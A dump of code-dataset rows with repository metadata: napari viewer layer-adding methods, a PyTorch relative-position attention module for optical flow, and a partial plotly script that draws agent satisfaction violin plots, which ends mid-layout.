edge_color_cycle=None,
edge_colormap='viridis',
edge_contrast_limits=None,
face_color='white',
face_color_cycle=None,
face_colormap='viridis',
face_contrast_limits=None,
n_dimensional=False,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
"""Add a points layer to the layers list.
Parameters
----------
data : array (N, D)
Coordinates for N points in D dimensions.
properties : dict {str: array (N,)}, DataFrame
Properties for each point. Each property should be an array of length N,
where N is the number of points.
symbol : str
Symbol to be used for the point markers. Must be one of the
following: arrow, clobber, cross, diamond, disc, hbar, ring,
square, star, tailed_arrow, triangle_down, triangle_up, vbar, x.
size : float, array
Size of the point marker. If given as a scalar, all points are made
the same size. If given as an array, size must be the same
broadcastable to the same shape as the data.
edge_width : float
Width of the symbol edge in pixels.
edge_color : str, array-like
Color of the point marker border. Numeric color values should be RGB(A).
edge_color_cycle : np.ndarray, list, cycle
Cycle of colors (provided as RGBA) to map to edge_color if a
categorical attribute is used to set face_color.
edge_colormap : str, vispy.color.colormap.Colormap
Colormap to set edge_color if a continuous attribute is used to set face_color.
See vispy docs for details: http://vispy.org/color.html#vispy.color.Colormap
edge_contrast_limits : None, (float, float)
clims for mapping the property to a color map. These are the min and max value
of the specified property that are mapped to 0 and 1, respectively.
The default value is None. If set the none, the clims will be set to
(property.min(), property.max())
face_color : str, array-like
Color of the point marker body. Numeric color values should be RGB(A).
face_color_cycle : np.ndarray, list, cycle
Cycle of colors (provided as RGBA) to map to face_color if a
categorical attribute is used to set face_color.
face_colormap : str, vispy.color.colormap.Colormap
Colormap to set face_color if a continuous attribute is used to set face_color.
See vispy docs for details: http://vispy.org/color.html#vispy.color.Colormap
face_contrast_limits : None, (float, float)
clims for mapping the property to a color map. These are the min and max value
of the specified property that are mapped to 0 and 1, respectively.
The default value is None. If set the none, the clims will be set to
(property.min(), property.max())
n_dimensional : bool
If True, renders points not just in central plane but also in all
n-dimensions according to specified point marker size.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
layer : :class:`napari.layers.Points`
The newly-created points layer.
Notes
-----
See vispy's marker visual docs for more details:
http://api.vispy.org/en/latest/visuals.html#vispy.visuals.MarkersVisual
"""
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty([0, ndim])
layer = layers.Points(
data=data,
properties=properties,
symbol=symbol,
size=size,
edge_width=edge_width,
edge_color=edge_color,
edge_color_cycle=edge_color_cycle,
edge_colormap=edge_colormap,
edge_contrast_limits=edge_contrast_limits,
face_color=face_color,
face_color_cycle=face_color_cycle,
face_colormap=face_colormap,
face_contrast_limits=face_contrast_limits,
n_dimensional=n_dimensional,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_labels(
self,
data=None,
*,
is_pyramid=None,
num_colors=50,
seed=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
path=None,
):
"""Add a labels (or segmentation) layer to the layers list.
An image-like layer where every pixel contains an integer ID
corresponding to the region it belongs to.
Parameters
----------
data : array or list of array
Labels data as an array or pyramid.
is_pyramid : bool
Whether the data is an image pyramid or not. Pyramid data is
represented by a list of array like image data. If not specified by
the user and if the data is a list of arrays that decrease in shape
then it will be taken to be a pyramid. The first image in the list
should be the largest.
num_colors : int
Number of unique colors to use in colormap.
seed : float
Seed for colormap random generator.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
path : str or list of str
Path or list of paths to image data. Paths can be passed as strings
or `pathlib.Path` instances.
Returns
-------
layer : :class:`napari.layers.Labels`
The newly-created labels layer.
"""
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
layer = layers.Labels(
data,
is_pyramid=is_pyramid,
num_colors=num_colors,
seed=seed,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_shapes(
self,
data=None,
*,
shape_type='rectangle',
edge_width=1,
edge_color='black',
face_color='white',
z_index=0,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
"""Add a shapes layer to the layers list.
Parameters
----------
data : list or array
List of shape data, where each element is an (N, D) array of the
N vertices of a shape in D dimensions. Can be an 3-dimensional
array if each shape has the same number of vertices.
shape_type : string or list
String of shape shape_type, must be one of "{'line', 'rectangle',
'ellipse', 'path', 'polygon'}". If a list is supplied it must be
the same length as the length of `data` and each element will be
applied to each shape otherwise the same value will be used for all
shapes.
edge_width : float or list
Thickness of lines and edges. If a list is supplied it must be the
same length as the length of `data` and each element will be
applied to each shape otherwise the same value will be used for all
shapes.
edge_color : str or list
If string can be any color name recognized by vispy or hex value if
starting with `#`. If array-like must be 1-dimensional array with 3
or 4 elements. If a list is supplied it must be the same length as
the length of `data` and each element will be applied to each shape
otherwise the same value will be used for all shapes.
face_color : str or list
If string can be any color name recognized by vispy or hex value if
starting with `#`. If array-like must be 1-dimensional array with 3
or 4 elements. If a list is supplied it must be the same length as
the length of `data` and each element will be applied to each shape
otherwise the same value will be used for all shapes.
z_index : int or list
Specifier of z order priority. Shapes with higher z order are
displayed ontop of others. If a list is supplied it must be the
same length as the length of `data` and each element will be
applied to each shape otherwise the same value will be used for all
shapes.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float or list
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
layer : :class:`napari.layers.Shapes`
The newly-created shapes layer.
"""
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty((0, 0, ndim))
layer = layers.Shapes(
data=data,
shape_type=shape_type,
edge_width=edge_width,
edge_color=edge_color,
face_color=face_color,
z_index=z_index,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_surface(
self,
data,
*,
colormap='gray',
contrast_limits=None,
gamma=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
"""Add a surface layer to the layers list.
Parameters
----------
data : 3-tuple of array
The first element of the tuple is an (N, D) array of vertices of
mesh triangles. The second is an (M, 3) array of int of indices
of the mesh triangles. The third element is the (K0, ..., KL, N)
array of values used to color vertices where the additional L
dimensions are used to color the same mesh with different values.
colormap : str, vispy.Color.Colormap, tuple, dict
Colormap to use for luminance images. If a string must be the name
of a supported colormap from vispy or matplotlib. If a tuple the
first value must be a string to assign as a name to a colormap and
the second item must be a Colormap. If a dict the key must be a
string to assign as a name to a colormap and the value must be a
Colormap.
contrast_limits : list (2,)
Color limits to be used for determining the colormap bounds for
luminance images. If not passed is calculated as the min and max of
the image.
gamma : float
Gamma correction for determining colormap linearity. Defaults to 1.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
layer : :class:`napari.layers.Surface`
The newly-created surface layer.
"""
layer = layers.Surface(
data,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_vectors(
self,
data,
*,
edge_width=1,
edge_color='red',
length=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
"""Add a vectors layer to the layers list.
Parameters
----------
data : (N, 2, D) or (N1, N2, ..., ND, D) array
An (N, 2, D) array is interpreted as "coordinate-like" data and a
list of N vectors with start point and projections of the vector in
D dimensions. An (N1, N2, ..., ND, D) array is interpreted as
"image-like" data where there is a length D vector of the
projections at each pixel.
edge_width : float
Width for all vectors in pixels.
length : float
Multiplicative factor on projections for length of all vectors.
edge_color : str
Edge color of all the vectors.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
layer : :class:`napari.layers.Vectors`
The newly-created vectors layer.
"""
layer = layers.Vectors(
data,
edge_width=edge_width,
edge_color=edge_color,
length=length,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def _add_layer_from_data(
self, data, meta: dict = None, layer_type: str = 'image'
):
"""Add arbitrary layer data to the viewer.
Primarily intended for usage by reader plugin hooks.
Parameters
----------
data : Any
Data in a format that is valid for the corresponding `add_*` method
of the specified ``layer_type``.
meta : dict, optional
Dict of keyword arguments that will be passed to the corresponding
`add_*` method. MUST NOT contain any keyword arguments that are
not valid for the corresponding method.
layer_type : str
Type of layer to add. MUST have a corresponding add_* method on
on the viewer instance.
Raises
------
ValueError
If ``layer_type`` is not one of the recognized layer types.
TypeError
If any keyword arguments in ``meta`` are unexpected for the
corresponding `add_*` method for this layer_type.
Examples
--------
A typical use case might be to upack a tuple of layer data with a
specified layer_type.
>>> viewer = napari.Viewer()
>>> data = (
... np.random.random((10, 2)) * 20,
... {'face_color': 'blue'},
... 'points',
... )
>>> viewer._add_layer_from_data(*data)
"""
layer_type = layer_type.lower()
if layer_type not in layers.NAMES:
raise ValueError(
f"Unrecognized layer_type: '{layer_type}'. "
f"Must be one of: {layers.NAMES}."
)
try:
add_method = getattr(self, 'add_' + layer_type)
except AttributeError:
raise NotImplementedError(
f"Sorry! {layer_type} is a valid layer type, but there is no "
f"viewer.add_{layer_type} available yet."
)
try:
add_method(data, **(meta or {}))
except TypeError as exc:
if 'unexpected keyword argument' in str(exc):
bad_key = str(exc).split('keyword argument ')[-1]
raise TypeError(
"_add_layer_from_data received an unexpected keyword "
f"argument ({bad_key}) for layer type {layer_type}"
) from exc
| 37.86911 | 91 | 0.572515 | import itertools
import numpy as np
from .. import layers
from ..utils import colormaps
from ..utils.misc import ensure_iterable, is_iterable
from ..utils import io
class AddLayersMixin:
def add_layer(self, layer):
layer.events.select.connect(self._update_active_layer)
layer.events.deselect.connect(self._update_active_layer)
layer.events.status.connect(self._update_status)
layer.events.help.connect(self._update_help)
layer.events.interactive.connect(self._update_interactive)
layer.events.cursor.connect(self._update_cursor)
layer.events.cursor_size.connect(self._update_cursor_size)
layer.events.data.connect(self._on_layers_change)
layer.dims.events.ndisplay.connect(self._on_layers_change)
layer.dims.events.order.connect(self._on_layers_change)
layer.dims.events.range.connect(self._on_layers_change)
self.layers.append(layer)
self._update_layers(layers=[layer])
if len(self.layers) == 1:
self.reset_view()
def add_image(
self,
data=None,
*,
channel_axis=None,
rgb=None,
is_pyramid=None,
colormap=None,
contrast_limits=None,
gamma=1,
interpolation='nearest',
rendering='mip',
iso_threshold=0.5,
attenuation=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending=None,
visible=True,
path=None,
):
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
if channel_axis is None:
if colormap is None:
colormap = 'gray'
if blending is None:
blending = 'translucent'
layer = layers.Image(
data,
rgb=rgb,
is_pyramid=is_pyramid,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
interpolation=interpolation,
rendering=rendering,
iso_threshold=iso_threshold,
attenuation=attenuation,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
else:
if is_pyramid:
n_channels = data[0].shape[channel_axis]
else:
n_channels = data.shape[channel_axis]
name = ensure_iterable(name)
if blending is None:
blending = 'additive'
if colormap is None:
if n_channels < 3:
colormap = colormaps.MAGENTA_GREEN
else:
colormap = itertools.cycle(colormaps.CYMRGB)
else:
colormap = ensure_iterable(colormap)
if contrast_limits is not None and not is_iterable(
contrast_limits[0]
):
contrast_limits = itertools.repeat(contrast_limits)
else:
contrast_limits = ensure_iterable(contrast_limits)
gamma = ensure_iterable(gamma)
layer_list = []
zipped_args = zip(
range(n_channels), colormap, contrast_limits, gamma, name
)
for i, cmap, clims, _gamma, name in zipped_args:
if is_pyramid:
image = [
np.take(data[j], i, axis=channel_axis)
for j in range(len(data))
]
else:
image = np.take(data, i, axis=channel_axis)
layer = layers.Image(
image,
rgb=rgb,
colormap=cmap,
contrast_limits=clims,
gamma=_gamma,
interpolation=interpolation,
rendering=rendering,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
layer_list.append(layer)
return layer_list
def add_points(
self,
data=None,
*,
properties=None,
symbol='o',
size=10,
edge_width=1,
edge_color='black',
edge_color_cycle=None,
edge_colormap='viridis',
edge_contrast_limits=None,
face_color='white',
face_color_cycle=None,
face_colormap='viridis',
face_contrast_limits=None,
n_dimensional=False,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty([0, ndim])
layer = layers.Points(
data=data,
properties=properties,
symbol=symbol,
size=size,
edge_width=edge_width,
edge_color=edge_color,
edge_color_cycle=edge_color_cycle,
edge_colormap=edge_colormap,
edge_contrast_limits=edge_contrast_limits,
face_color=face_color,
face_color_cycle=face_color_cycle,
face_colormap=face_colormap,
face_contrast_limits=face_contrast_limits,
n_dimensional=n_dimensional,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_labels(
self,
data=None,
*,
is_pyramid=None,
num_colors=50,
seed=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
path=None,
):
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
layer = layers.Labels(
data,
is_pyramid=is_pyramid,
num_colors=num_colors,
seed=seed,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_shapes(
self,
data=None,
*,
shape_type='rectangle',
edge_width=1,
edge_color='black',
face_color='white',
z_index=0,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty((0, 0, ndim))
layer = layers.Shapes(
data=data,
shape_type=shape_type,
edge_width=edge_width,
edge_color=edge_color,
face_color=face_color,
z_index=z_index,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_surface(
self,
data,
*,
colormap='gray',
contrast_limits=None,
gamma=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
layer = layers.Surface(
data,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_vectors(
self,
data,
*,
edge_width=1,
edge_color='red',
length=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
layer = layers.Vectors(
data,
edge_width=edge_width,
edge_color=edge_color,
length=length,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def _add_layer_from_data(
self, data, meta: dict = None, layer_type: str = 'image'
):
layer_type = layer_type.lower()
if layer_type not in layers.NAMES:
raise ValueError(
f"Unrecognized layer_type: '{layer_type}'. "
f"Must be one of: {layers.NAMES}."
)
try:
add_method = getattr(self, 'add_' + layer_type)
except AttributeError:
raise NotImplementedError(
f"Sorry! {layer_type} is a valid layer type, but there is no "
f"viewer.add_{layer_type} available yet."
)
try:
add_method(data, **(meta or {}))
except TypeError as exc:
if 'unexpected keyword argument' in str(exc):
bad_key = str(exc).split('keyword argument ')[-1]
raise TypeError(
"_add_layer_from_data received an unexpected keyword "
f"argument ({bad_key}) for layer type {layer_type}"
) from exc
| true | true |
f7235fc664c9234fd731422b0aaf6fa17bccc2fc | 5,410 | py | Python | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | 2 | 2022-03-14T04:35:26.000Z | 2022-03-25T12:33:47.000Z | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | null | null | null | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | null | null | null | import torch
from torch import nn, einsum
from einops import rearrange
# max_pos_size = 160
class RelPosEmb(nn.Module):
def __init__(
self,
max_pos_size,
dim_head
):
super().__init__()
self.rel_height = nn.Embedding(2 * max_pos_size - 1, dim_head)
self.rel_width = nn.Embedding(2 * max_pos_size - 1, dim_head)
deltas = torch.arange(max_pos_size).view(1, -1) - torch.arange(max_pos_size).view(-1, 1)
# rel_ind[i, j] = j - i + 159.
rel_ind = deltas + max_pos_size - 1
self.register_buffer('rel_ind', rel_ind)
def forward(self, q):
# q: [8, 1, 46, 62, 128]
batch, heads, h, w, c = q.shape
# self.rel_ind[:h, :h]: [46, 46]
# self.rel_ind[:w, :w]: [62, 62]
# rel_ind[i,j] = j - i + 159, precomputed distance between i, j.
# This assumes the input x (from which q is derived) is precisely on the grid.
# This is fine when we do self-attention on x.
# However, it will be somewhat limiting if we use RelPosEmb on cross-attention between two frames,
# particularly when we use flow_init != 0 (on sintel),
# we better get the positional encodings of x according to flow_init, instead of the grid of x.
# However, an accurate computation of the relative distances between all input units is expensive.
# Since values in flow_init are usually small, this inaccuracy may be negligible.
height_emb = self.rel_height(self.rel_ind[:h, :h].reshape(-1))
width_emb = self.rel_width( self.rel_ind[:w, :w].reshape(-1))
# height_emb: [46*46, 128] => [46, 46, 1, 128]
# width_emb: [62*62, 128] => [62, 1, 62, 128]
# height_emb[i, j]: the embedding of element at (i,j) as a function of the height difference (i-j).
# width_emb[i, j]: the embedding of element at (i,j) as a function of the width difference (i-j).
height_emb = rearrange(height_emb, '(x u) d -> x u () d', x=h)
width_emb = rearrange(width_emb, '(y v) d -> y () v d', y=w)
# outer product? y, uv -> y u v b h x y d x u v d
# height_score: [8, 1, 46, 62, 46, 1] <= [8, 1, 46, 62, 128] * [46, 46, 1, 128]
# width_score: [8, 1, 46, 62, 1, 62]
height_score = einsum('b h x y d, x u v d -> b h x y u v', q, height_emb)
width_score = einsum('b h x y d, y u v d -> b h x y u v', q, width_emb)
# height_score + width_score: [8, 1, 46, 62, 46, 62], 65071232 elements.
return height_score + width_score
class Attention(nn.Module):
def __init__(
self,
*,
args,
dim,
max_pos_size = 100,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_qk = nn.Conv2d(dim, inner_dim * 2, 1, bias=False)
self.pos_emb = RelPosEmb(max_pos_size, dim_head)
self.pos_embed_weight = 1.0
def forward(self, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
# q, k: [8, 128, 46, 62]
q, k = self.to_qk(fmap).chunk(2, dim=1)
# q, k: [8, 1, 46, 62, 128]
q, k = map(lambda t: rearrange(t, 'b (h d) x y -> b h x y d', h=heads), (q, k))
# Why not scale k?
q = self.scale * q
if self.args.position_only:
sim = self.pos_emb(q)
elif self.args.position_and_content:
# [..., 46, 62, ...] . [..., 46, 62, ...] => [..., 46, 62, 46, 62]
sim_content = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim_pos = self.pos_emb(q)
sim = sim_content + self.pos_embed_weight * sim_pos
else:
# q, k: [B, 1, 46, 62, 128]
# sim: [B, 1, 46, 62, 46, 62]
sim = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim = rearrange(sim, 'b h x y u v -> b h (x y) (u v)')
attn = sim.softmax(dim=-1)
return attn
# Aggregate output is dim-dimensional, same as the input. No FFN is used.
class Aggregate(nn.Module):
def __init__(
self,
args,
dim,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_v = nn.Conv2d(dim, inner_dim, 1, bias=False)
self.gamma = nn.Parameter(torch.zeros(1))
if dim != inner_dim:
self.project = nn.Conv2d(inner_dim, dim, 1, bias=False)
else:
self.project = None
def forward(self, attn, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
v = self.to_v(fmap)
v = rearrange(v, 'b (h d) x y -> b h (x y) d', h=heads)
out = einsum('b h i j, b h j d -> b h i d', attn, v)
out = rearrange(out, 'b h (x y) d -> b (h d) x y', x=h, y=w)
# project is None for GMA.
if self.project is not None:
out = self.project(out)
out = fmap + self.gamma * out
return out
if __name__ == "__main__":
att = Attention(dim=128, heads=1)
fmap = torch.randn(2, 128, 40, 90)
out = att(fmap)
print(out.shape)
| 35.827815 | 107 | 0.533272 | import torch
from torch import nn, einsum
from einops import rearrange
class RelPosEmb(nn.Module):
def __init__(
self,
max_pos_size,
dim_head
):
super().__init__()
self.rel_height = nn.Embedding(2 * max_pos_size - 1, dim_head)
self.rel_width = nn.Embedding(2 * max_pos_size - 1, dim_head)
deltas = torch.arange(max_pos_size).view(1, -1) - torch.arange(max_pos_size).view(-1, 1)
rel_ind = deltas + max_pos_size - 1
self.register_buffer('rel_ind', rel_ind)
def forward(self, q):
batch, heads, h, w, c = q.shape
height_emb = self.rel_height(self.rel_ind[:h, :h].reshape(-1))
width_emb = self.rel_width( self.rel_ind[:w, :w].reshape(-1))
height_emb = rearrange(height_emb, '(x u) d -> x u () d', x=h)
width_emb = rearrange(width_emb, '(y v) d -> y () v d', y=w)
height_score = einsum('b h x y d, x u v d -> b h x y u v', q, height_emb)
width_score = einsum('b h x y d, y u v d -> b h x y u v', q, width_emb)
return height_score + width_score
class Attention(nn.Module):
def __init__(
self,
*,
args,
dim,
max_pos_size = 100,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_qk = nn.Conv2d(dim, inner_dim * 2, 1, bias=False)
self.pos_emb = RelPosEmb(max_pos_size, dim_head)
self.pos_embed_weight = 1.0
def forward(self, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
q, k = self.to_qk(fmap).chunk(2, dim=1)
q, k = map(lambda t: rearrange(t, 'b (h d) x y -> b h x y d', h=heads), (q, k))
q = self.scale * q
if self.args.position_only:
sim = self.pos_emb(q)
elif self.args.position_and_content:
sim_content = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim_pos = self.pos_emb(q)
sim = sim_content + self.pos_embed_weight * sim_pos
else:
sim = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim = rearrange(sim, 'b h x y u v -> b h (x y) (u v)')
attn = sim.softmax(dim=-1)
return attn
class Aggregate(nn.Module):
def __init__(
self,
args,
dim,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_v = nn.Conv2d(dim, inner_dim, 1, bias=False)
self.gamma = nn.Parameter(torch.zeros(1))
if dim != inner_dim:
self.project = nn.Conv2d(inner_dim, dim, 1, bias=False)
else:
self.project = None
def forward(self, attn, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
v = self.to_v(fmap)
v = rearrange(v, 'b (h d) x y -> b h (x y) d', h=heads)
out = einsum('b h i j, b h j d -> b h i d', attn, v)
out = rearrange(out, 'b h (x y) d -> b (h d) x y', x=h, y=w)
if self.project is not None:
out = self.project(out)
out = fmap + self.gamma * out
return out
if __name__ == "__main__":
att = Attention(dim=128, heads=1)
fmap = torch.randn(2, 128, 40, 90)
out = att(fmap)
print(out.shape)
| true | true |
f72361b431087bf4ff87976c66774cf113aa3b6e | 7,023 | py | Python | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | null | null | null | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | null | null | null | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | 3 | 2019-09-11T04:14:15.000Z | 2021-03-01T15:16:57.000Z | import ast
import csv
import inflect
import os
import plotly as py
import sys
from typing import Any, Dict, List
""" Takes pre-prepared data from the SimulationVisualiserInitiator class and produces a series of violin plots
comparing the satisfaction distributions of the different agent types at the end of a series of specified key days.
Data is averaged over all simulation runs.
Parameters
---------
folderName : str
The output destination folder, used to organise output data.
tag : str
A unique tag so that generated graphs can easily be associated with their corresponding data sets.
individualSatisfactions : str
The absolute path of the data set required for generating the violin plots showing the satisfaction distributions
for each agent type at the end of the key days.
totalDaysSimulated : int
The total number of days that have been simulated, determines graphs axis dimensions.
totalExchangesSimulated : int
The total number of exchanges that have been simulated, determines graphs axis dimensions.
daysToVisualise : str
The specific days that will have a line graph of the agent satisfactions at the end of each round throughout the
day generated. Note that this is immediately converted to type List[int].
"""
# Get the output folder from command line arguments.
folderName: str = sys.argv[1]
# Unique identifier to identify which run the produced graphs are associated with.
tag: str = sys.argv[2]
# Get the location of the raw data that requires visualising from command line arguments.
individualSatisfactions: str = sys.argv[3]
# Get the scope of the data to be visualised.
totalDaysSimulated: int = int(sys.argv[4])
totalExchangesSimulated: int = int(sys.argv[5])
# Get the specific days to have average satisfaction visualised throughout the day.
daysToVisualise: List[int] = ast.literal_eval(sys.argv[6])
# Used to get ordinal word versions of integers for graph titles.
inflect = inflect.engine()
# Get the directory in which the generated graphs will be stored.
duringDayOutputDirectory: str = \
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))),
folderName
+ '/'
+ tag
+ '/images/DDDataAnalysis/EoDSD')
# Create the output directory if it does not already exist.
if not os.path.exists(duringDayOutputDirectory):
os.makedirs(duringDayOutputDirectory)
# Get suitable filenames format for the graphs that will be produced from existing raw data files.
baseFileName: str = individualSatisfactions.split('/')[-1]
convertedBaseFileName: str = baseFileName.split('.')[0] + '.pdf'
# Store the scope of the data.
days: List[str] = []
fieldNames: List[str] = ["Selfish", "Social"]
for day in range(1, totalDaysSimulated + 1):
days.append(str(day))
# Options for graph styling.
colours: List[str] = ['purple', 'green', 'red', 'blue']
lineTypes: List[str] = ['1px', 'solid', '15px', '5px']
# Violin plots show the distributions of individual satisfactions for individual agents at the end of key days
with open(individualSatisfactions) as individualSatisfactionDeviations:
reader = csv.reader(individualSatisfactionDeviations)
# Each pre-selected is visualised in its own graph.
for i in range(len(daysToVisualise)):
# Store calculated graph data
data: Any = []
# Used to distinguish results when many agent types present.
lineType: int = 0
colour: int = 0
# Each agent type is plotted separately.
firstType = True
for j in range(len(fieldNames)):
satisfactions: List[float] = []
individualSatisfactionDeviations.seek(0)
# The first line contains only headers and so can be skipped.
next(reader)
for row in reader:
# The field type column + 1 used as agent types start at 1 as opposed to 0.
if int(row[0]) == int(daysToVisualise[i]) \
and int(row[1]) == int(j + 1):
satisfactions.append(float(row[2]))
# Add the agent types data plots to the graph data.
if firstType:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='negative',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
firstType = False
else:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='positive',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
lineType += 1
colour += 1
# The day value is converted into the ordinal word form for styling.
day: str = inflect.number_to_words(inflect.ordinal(daysToVisualise[i]))
# Style the graph layout
layout: any = dict(
title=dict(
text='Satisfaction deviation during the<br>' + day + ' day',
xanchor='center',
x=0.5,
),
yaxis=dict(
title='Average consumer satisfaction',
showline=True,
linecolor='black',
linewidth=1,
gridcolor='rgb(225, 225, 225)',
gridwidth=1,
range=[0, 1],
